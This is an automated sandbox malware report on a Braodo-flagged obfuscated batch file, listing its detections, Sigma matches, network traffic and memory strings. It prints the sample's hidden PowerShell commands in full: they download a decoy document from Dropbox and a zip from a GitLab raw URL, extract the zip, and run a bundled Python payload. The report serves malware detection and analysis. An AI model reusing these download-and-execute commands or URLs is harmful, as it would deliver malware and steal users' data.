
Windows Analysis Report
hnl2bose13.bat

Overview

General Information

Sample name: hnl2bose13.bat
Analysis ID: 1557463
MD5: a004836443420d9b08b715e5757afb5a
SHA1: 11a2c48f70ce60ee145cf243173791099212082d
SHA256: 6bf5abcdd7110ce950b92f4128c16e52cd2c9401f69955c1b112958ee64bcb0e
Tags: bat, Braodo, user-JAMESWT_MHT

Detection

Abobus Obfuscator, Braodo
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 5536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 5308 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 2848 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • findstr.exe (PID: 5848 cmdline: fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6960 cmdline: fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 5032 cmdline: fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 3492 cmdline: fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 1048 cmdline: fINd MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • find.exe (PID: 4876 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 6116 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5896 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3560 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1584 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3852 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5048 cmdline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author
hnl2bose13.bat | JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security
Process Memory Space: powershell.exe PID: 5896 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 1584 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_5896.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_1584.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_5048.amsi.csv | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
Source: File created, Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1584, TargetFilename: C:\Users\Public\Document.zip
Source: Process started, Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T09:56:12.487269+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49729 | 172.65.251.78 | 443 | TCP


AV Detection

Source: https://instructorledlearning.dropboxbusiness.com/, Avira URL Cloud: Label: phishing
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.2% probability
Source: unknown, HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F14B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb' source: powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1540000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2324464767.00000254F1549000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb" source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1546000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.2212283273.000001F3F17AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.IO.Compression.FileSystem.pdbH source: powershell.exe, 00000010.00000002.2353641518.000002440223A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp
Source: global traffic, HTTP traffic detected: GET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1 | Host: www.dropbox.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1 | Host: gitlab.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /users/sign_in HTTP/1.1 | Host: gitlab.com
Source: Joe Sandbox View, IP Address: 172.65.251.78 172.65.251.78
Source: Joe Sandbox View, IP Address: 162.125.66.18 162.125.66.18
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49729 -> 172.65.251.78:443
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1 | Host: www.dropbox.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1 | Host: gitlab.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /users/sign_in HTTP/1.1 | Host: gitlab.com
Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: Policy: media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: ct-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' 